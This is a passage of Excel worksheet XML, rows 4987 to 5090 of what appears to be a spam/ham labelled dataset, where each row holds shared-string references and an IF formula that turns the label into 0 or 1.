    <row r="4987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4987" t="s">
        <v>9942</v>
      </c>
      <c r="B4987" t="s">
        <v>5294</v>
      </c>
      <c r="C4987" s="1">
        <f>IF(B4987="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4988" t="s">
        <v>9943</v>
      </c>
      <c r="B4988" t="s">
        <v>5294</v>
      </c>
      <c r="C4988" s="1">
        <f>IF(B4988="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4989" t="s">
        <v>9944</v>
      </c>
      <c r="B4989" t="s">
        <v>5294</v>
      </c>
      <c r="C4989" s="1">
        <f>IF(B4989="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4990" t="s">
        <v>9945</v>
      </c>
      <c r="B4990" t="s">
        <v>5294</v>
      </c>
      <c r="C4990" s="1">
        <f>IF(B4990="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4991" t="s">
        <v>9946</v>
      </c>
      <c r="B4991" t="s">
        <v>5297</v>
      </c>
      <c r="C4991" s="1">
        <f>IF(B4991="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4992" t="s">
        <v>9947</v>
      </c>
      <c r="B4992" t="s">
        <v>5294</v>
      </c>
      <c r="C4992" s="1">
        <f>IF(B4992="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4993" t="s">
        <v>9948</v>
      </c>
      <c r="B4993" t="s">
        <v>5294</v>
      </c>
      <c r="C4993" s="1">
        <f>IF(B4993="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4994" t="s">
        <v>9949</v>
      </c>
      <c r="B4994" t="s">
        <v>5294</v>
      </c>
      <c r="C4994" s="1">
        <f>IF(B4994="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4995" t="s">
        <v>9950</v>
      </c>
      <c r="B4995" t="s">
        <v>5294</v>
      </c>
      <c r="C4995" s="1">
        <f>IF(B4995="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4996" t="s">
        <v>9951</v>
      </c>
      <c r="B4996" t="s">
        <v>5294</v>
      </c>
      <c r="C4996" s="1">
        <f>IF(B4996="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4997" t="s">
        <v>9952</v>
      </c>
      <c r="B4997" t="s">
        <v>5294</v>
      </c>
      <c r="C4997" s="1">
        <f>IF(B4997="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4998" t="s">
        <v>9953</v>
      </c>
      <c r="B4998" t="s">
        <v>5294</v>
      </c>
      <c r="C4998" s="1">
        <f>IF(B4998="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4999" t="s">
        <v>9954</v>
      </c>
      <c r="B4999" t="s">
        <v>5294</v>
      </c>
      <c r="C4999" s="1">
        <f>IF(B4999="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5000" t="s">
        <v>9955</v>
      </c>
      <c r="B5000" t="s">
        <v>5294</v>
      </c>
      <c r="C5000" s="1">
        <f>IF(B5000="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5001" t="s">
        <v>9956</v>
      </c>
      <c r="B5001" t="s">
        <v>5294</v>
      </c>
      <c r="C5001" s="1">
        <f>IF(B5001="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5002" t="s">
        <v>9957</v>
      </c>
      <c r="B5002" t="s">
        <v>5294</v>
      </c>
      <c r="C5002" s="1">
        <f>IF(B5002="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5003" t="s">
        <v>9958</v>
      </c>
      <c r="B5003" t="s">
        <v>5294</v>
      </c>
      <c r="C5003" s="1">
        <f>IF(B5003="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5004" t="s">
        <v>9959</v>
      </c>
      <c r="B5004" t="s">
        <v>5297</v>
      </c>
      <c r="C5004" s="1">
        <f>IF(B5004="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5005" t="s">
        <v>9960</v>
      </c>
      <c r="B5005" t="s">
        <v>5294</v>
      </c>
      <c r="C5005" s="1">
        <f>IF(B5005="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5006" t="s">
        <v>9961</v>
      </c>
      <c r="B5006" t="s">
        <v>5294</v>
      </c>
      <c r="C5006" s="1">
        <f>IF(B5006="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5007" t="s">
        <v>9962</v>
      </c>
      <c r="B5007" t="s">
        <v>5294</v>
      </c>
      <c r="C5007" s="1">
        <f>IF(B5007="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5008" t="s">
        <v>9963</v>
      </c>
      <c r="B5008" t="s">
        <v>5294</v>
      </c>
      <c r="C5008" s="1">
        <f>IF(B5008="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5009" t="s">
        <v>9964</v>
      </c>
      <c r="B5009" t="s">
        <v>5294</v>
      </c>
      <c r="C5009" s="1">
        <f>IF(B5009="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5010" t="s">
        <v>9965</v>
      </c>
      <c r="B5010" t="s">
        <v>5294</v>
      </c>
      <c r="C5010" s="1">
        <f>IF(B5010="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5011" t="s">
        <v>9966</v>
      </c>
      <c r="B5011" t="s">
        <v>5294</v>
      </c>
      <c r="C5011" s="1">
        <f>IF(B5011="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5012" t="s">
        <v>9967</v>
      </c>
      <c r="B5012" t="s">
        <v>5297</v>
      </c>
      <c r="C5012" s="1">
        <f>IF(B5012="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5013" t="s">
        <v>9968</v>
      </c>
      <c r="B5013" t="s">
        <v>5294</v>
      </c>
      <c r="C5013" s="1">
        <f>IF(B5013="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5014" t="s">
        <v>9969</v>
      </c>
      <c r="B5014" t="s">
        <v>5294</v>
      </c>
      <c r="C5014" s="1">
        <f>IF(B5014="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5015" t="s">
        <v>9970</v>
      </c>
      <c r="B5015" t="s">
        <v>5294</v>
      </c>
      <c r="C5015" s="1">
        <f>IF(B5015="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5016" t="s">
        <v>9971</v>
      </c>
      <c r="B5016" t="s">
        <v>5294</v>
      </c>
      <c r="C5016" s="1">
        <f>IF(B5016="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5017" t="s">
        <v>9972</v>
      </c>
      <c r="B5017" t="s">
        <v>5294</v>
      </c>
      <c r="C5017" s="1">
        <f>IF(B5017="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5018" t="s">
        <v>9973</v>
      </c>
      <c r="B5018" t="s">
        <v>5297</v>
      </c>
      <c r="C5018" s="1">
        <f>IF(B5018="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5019" t="s">
        <v>9974</v>
      </c>
      <c r="B5019" t="s">
        <v>5294</v>
      </c>
      <c r="C5019" s="1">
        <f>IF(B5019="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5020" t="s">
        <v>9975</v>
      </c>
      <c r="B5020" t="s">
        <v>5294</v>
      </c>
      <c r="C5020" s="1">
        <f>IF(B5020="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5021" t="s">
        <v>9976</v>
      </c>
      <c r="B5021" t="s">
        <v>5294</v>
      </c>
      <c r="C5021" s="1">
        <f>IF(B5021="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5022" t="s">
        <v>9977</v>
      </c>
      <c r="B5022" t="s">
        <v>5294</v>
      </c>
      <c r="C5022" s="1">
        <f>IF(B5022="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5023" t="s">
        <v>9978</v>
      </c>
      <c r="B5023" t="s">
        <v>5294</v>
      </c>
      <c r="C5023" s="1">
        <f>IF(B5023="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5024" t="s">
        <v>9979</v>
      </c>
      <c r="B5024" t="s">
        <v>5294</v>
      </c>
      <c r="C5024" s="1">
        <f>IF(B5024="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5025" t="s">
        <v>9980</v>
      </c>
      <c r="B5025" t="s">
        <v>5294</v>
      </c>
      <c r="C5025" s="1">
        <f>IF(B5025="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5026" t="s">
        <v>9981</v>
      </c>
      <c r="B5026" t="s">
        <v>5294</v>
      </c>
      <c r="C5026" s="1">
        <f>IF(B5026="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5027" t="s">
        <v>9982</v>
      </c>
      <c r="B5027" t="s">
        <v>5297</v>
      </c>
      <c r="C5027" s="1">
        <f>IF(B5027="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5028" t="s">
        <v>9983</v>
      </c>
      <c r="B5028" t="s">
        <v>5297</v>
      </c>
      <c r="C5028" s="1">
        <f>IF(B5028="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5029" t="s">
        <v>9984</v>
      </c>
      <c r="B5029" t="s">
        <v>5294</v>
      </c>
      <c r="C5029" s="1">
        <f>IF(B5029="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5030" t="s">
        <v>9985</v>
      </c>
      <c r="B5030" t="s">
        <v>5297</v>
      </c>
      <c r="C5030" s="1">
        <f>IF(B5030="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5031" t="s">
        <v>7662</v>
      </c>
      <c r="B5031" t="s">
        <v>5294</v>
      </c>
      <c r="C5031" s="1">
        <f>IF(B5031="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5032" t="s">
        <v>9986</v>
      </c>
      <c r="B5032" t="s">
        <v>5294</v>
      </c>
      <c r="C5032" s="1">
        <f>IF(B5032="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5033" t="s">
        <v>9987</v>
      </c>
      <c r="B5033" t="s">
        <v>5294</v>
      </c>
      <c r="C5033" s="1">
        <f>IF(B5033="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5034" t="s">
        <v>9988</v>
      </c>
      <c r="B5034" t="s">
        <v>5294</v>
      </c>
      <c r="C5034" s="1">
        <f>IF(B5034="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5035" t="s">
        <v>9989</v>
      </c>
      <c r="B5035" t="s">
        <v>5294</v>
      </c>
      <c r="C5035" s="1">
        <f>IF(B5035="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5036" t="s">
        <v>9990</v>
      </c>
      <c r="B5036" t="s">
        <v>5294</v>
      </c>
      <c r="C5036" s="1">
        <f>IF(B5036="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5037" t="s">
        <v>8668</v>
      </c>
      <c r="B5037" t="s">
        <v>5297</v>
      </c>
      <c r="C5037" s="1">
        <f>IF(B5037="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5038" t="s">
        <v>9991</v>
      </c>
      <c r="B5038" t="s">
        <v>5294</v>
      </c>
      <c r="C5038" s="1">
        <f>IF(B5038="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5039" t="s">
        <v>9992</v>
      </c>
      <c r="B5039" t="s">
        <v>5294</v>
      </c>
      <c r="C5039" s="1">
        <f>IF(B5039="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5040" t="s">
        <v>9993</v>
      </c>
      <c r="B5040" t="s">
        <v>5294</v>
      </c>
      <c r="C5040" s="1">
        <f>IF(B5040="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5041" t="s">
        <v>9994</v>
      </c>
      <c r="B5041" t="s">
        <v>5297</v>
      </c>
      <c r="C5041" s="1">
        <f>IF(B5041="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5042" t="s">
        <v>9995</v>
      </c>
      <c r="B5042" t="s">
        <v>5294</v>
      </c>
      <c r="C5042" s="1">
        <f>IF(B5042="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5043" t="s">
        <v>9996</v>
      </c>
      <c r="B5043" t="s">
        <v>5297</v>
      </c>
      <c r="C5043" s="1">
        <f>IF(B5043="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5044" t="s">
        <v>9997</v>
      </c>
      <c r="B5044" t="s">
        <v>5294</v>
      </c>
      <c r="C5044" s="1">
        <f>IF(B5044="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5045" t="s">
        <v>9998</v>
      </c>
      <c r="B5045" t="s">
        <v>5294</v>
      </c>
      <c r="C5045" s="1">
        <f>IF(B5045="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5046" t="s">
        <v>6518</v>
      </c>
      <c r="B5046" t="s">
        <v>5294</v>
      </c>
      <c r="C5046" s="1">
        <f>IF(B5046="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5047" t="s">
        <v>9999</v>
      </c>
      <c r="B5047" t="s">
        <v>5294</v>
      </c>
      <c r="C5047" s="1">
        <f>IF(B5047="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5048" t="s">
        <v>10000</v>
      </c>
      <c r="B5048" t="s">
        <v>5294</v>
      </c>
      <c r="C5048" s="1">
        <f>IF(B5048="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5049" t="s">
        <v>10001</v>
      </c>
      <c r="B5049" t="s">
        <v>5294</v>
      </c>
      <c r="C5049" s="1">
        <f>IF(B5049="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5050" t="s">
        <v>6310</v>
      </c>
      <c r="B5050" t="s">
        <v>5294</v>
      </c>
      <c r="C5050" s="1">
        <f>IF(B5050="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5051" t="s">
        <v>10002</v>
      </c>
      <c r="B5051" t="s">
        <v>5294</v>
      </c>
      <c r="C5051" s="1">
        <f>IF(B5051="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5052" t="s">
        <v>10003</v>
      </c>
      <c r="B5052" t="s">
        <v>5294</v>
      </c>
      <c r="C5052" s="1">
        <f>IF(B5052="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5053" t="s">
        <v>10004</v>
      </c>
      <c r="B5053" t="s">
        <v>5294</v>
      </c>
      <c r="C5053" s="1">
        <f>IF(B5053="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5054" t="s">
        <v>10005</v>
      </c>
      <c r="B5054" t="s">
        <v>5294</v>
      </c>
      <c r="C5054" s="1">
        <f>IF(B5054="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5055" t="s">
        <v>6633</v>
      </c>
      <c r="B5055" t="s">
        <v>5297</v>
      </c>
      <c r="C5055" s="1">
        <f>IF(B5055="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5056" t="s">
        <v>10006</v>
      </c>
      <c r="B5056" t="s">
        <v>5294</v>
      </c>
      <c r="C5056" s="1">
        <f>IF(B5056="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5057" t="s">
        <v>10007</v>
      </c>
      <c r="B5057" t="s">
        <v>5294</v>
      </c>
      <c r="C5057" s="1">
        <f>IF(B5057="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5058" t="s">
        <v>10008</v>
      </c>
      <c r="B5058" t="s">
        <v>5294</v>
      </c>
      <c r="C5058" s="1">
        <f>IF(B5058="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5059" t="s">
        <v>10009</v>
      </c>
      <c r="B5059" t="s">
        <v>5294</v>
      </c>
      <c r="C5059" s="1">
        <f>IF(B5059="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5060" t="s">
        <v>10010</v>
      </c>
      <c r="B5060" t="s">
        <v>5297</v>
      </c>
      <c r="C5060" s="1">
        <f>IF(B5060="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5061" t="s">
        <v>10011</v>
      </c>
      <c r="B5061" t="s">
        <v>5294</v>
      </c>
      <c r="C5061" s="1">
        <f>IF(B5061="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5062" t="s">
        <v>10012</v>
      </c>
      <c r="B5062" t="s">
        <v>5294</v>
      </c>
      <c r="C5062" s="1">
        <f>IF(B5062="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5063" t="s">
        <v>10013</v>
      </c>
      <c r="B5063" t="s">
        <v>5294</v>
      </c>
      <c r="C5063" s="1">
        <f>IF(B5063="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5064" t="s">
        <v>10014</v>
      </c>
      <c r="B5064" t="s">
        <v>5294</v>
      </c>
      <c r="C5064" s="1">
        <f>IF(B5064="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5065" t="s">
        <v>10015</v>
      </c>
      <c r="B5065" t="s">
        <v>5294</v>
      </c>
      <c r="C5065" s="1">
        <f>IF(B5065="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5066" t="s">
        <v>10016</v>
      </c>
      <c r="B5066" t="s">
        <v>5294</v>
      </c>
      <c r="C5066" s="1">
        <f>IF(B5066="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5067" t="s">
        <v>10017</v>
      </c>
      <c r="B5067" t="s">
        <v>5294</v>
      </c>
      <c r="C5067" s="1">
        <f>IF(B5067="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5068" t="s">
        <v>10018</v>
      </c>
      <c r="B5068" t="s">
        <v>5297</v>
      </c>
      <c r="C5068" s="1">
        <f>IF(B5068="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5069" t="s">
        <v>10019</v>
      </c>
      <c r="B5069" t="s">
        <v>5294</v>
      </c>
      <c r="C5069" s="1">
        <f>IF(B5069="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5070" t="s">
        <v>10020</v>
      </c>
      <c r="B5070" t="s">
        <v>5294</v>
      </c>
      <c r="C5070" s="1">
        <f>IF(B5070="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5071" t="s">
        <v>10021</v>
      </c>
      <c r="B5071" t="s">
        <v>5297</v>
      </c>
      <c r="C5071" s="1">
        <f>IF(B5071="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5072" t="s">
        <v>10022</v>
      </c>
      <c r="B5072" t="s">
        <v>5294</v>
      </c>
      <c r="C5072" s="1">
        <f>IF(B5072="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5073" t="s">
        <v>10023</v>
      </c>
      <c r="B5073" t="s">
        <v>5297</v>
      </c>
      <c r="C5073" s="1">
        <f>IF(B5073="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5074" t="s">
        <v>10024</v>
      </c>
      <c r="B5074" t="s">
        <v>5294</v>
      </c>
      <c r="C5074" s="1">
        <f>IF(B5074="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5075" t="s">
        <v>9358</v>
      </c>
      <c r="B5075" t="s">
        <v>5294</v>
      </c>
      <c r="C5075" s="1">
        <f>IF(B5075="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5076" t="s">
        <v>10025</v>
      </c>
      <c r="B5076" t="s">
        <v>5297</v>
      </c>
      <c r="C5076" s="1">
        <f>IF(B5076="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5077" t="s">
        <v>10026</v>
      </c>
      <c r="B5077" t="s">
        <v>5294</v>
      </c>
      <c r="C5077" s="1">
        <f>IF(B5077="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5078" t="s">
        <v>10027</v>
      </c>
      <c r="B5078" t="s">
        <v>5294</v>
      </c>
      <c r="C5078" s="1">
        <f>IF(B5078="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5079" t="s">
        <v>10028</v>
      </c>
      <c r="B5079" t="s">
        <v>5297</v>
      </c>
      <c r="C5079" s="1">
        <f>IF(B5079="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5080" t="s">
        <v>10029</v>
      </c>
      <c r="B5080" t="s">
        <v>5294</v>
      </c>
      <c r="C5080" s="1">
        <f>IF(B5080="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5081" t="s">
        <v>10030</v>
      </c>
      <c r="B5081" t="s">
        <v>5294</v>
      </c>
      <c r="C5081" s="1">
        <f>IF(B5081="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5082" t="s">
        <v>10031</v>
      </c>
      <c r="B5082" t="s">
        <v>5294</v>
      </c>
      <c r="C5082" s="1">
        <f>IF(B5082="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5083" t="s">
        <v>10032</v>
      </c>
      <c r="B5083" t="s">
        <v>5294</v>
      </c>
      <c r="C5083" s="1">
        <f>IF(B5083="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5084" t="s">
        <v>10033</v>
      </c>
      <c r="B5084" t="s">
        <v>5294</v>
      </c>
      <c r="C5084" s="1">
        <f>IF(B5084="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5085" t="s">
        <v>10034</v>
      </c>
      <c r="B5085" t="s">
        <v>5294</v>
      </c>
      <c r="C5085" s="1">
        <f>IF(B5085="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5086" t="s">
        <v>10035</v>
      </c>
      <c r="B5086" t="s">
        <v>5294</v>
      </c>
      <c r="C5086" s="1">
        <f>IF(B5086="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5087" t="s">
        <v>10036</v>
      </c>
      <c r="B5087" t="s">
        <v>5294</v>
      </c>
      <c r="C5087" s="1">
        <f>IF(B5087="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5088" t="s">
        <v>10037</v>
      </c>
      <c r="B5088" t="s">
        <v>5294</v>
      </c>
      <c r="C5088" s="1">
        <f>IF(B5088="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5089" t="s">
        <v>10038</v>
      </c>
      <c r="B5089" t="s">
        <v>5294</v>
      </c>
      <c r="C5089" s="1">
        <f>IF(B5089="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5090" t="s">
        <v>10039</v>
      </c>
      <c r="B5090" t="s">
        <v>5294</v>
      </c>
      <c r="C5090" s="1">
        <f>IF(B5090="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
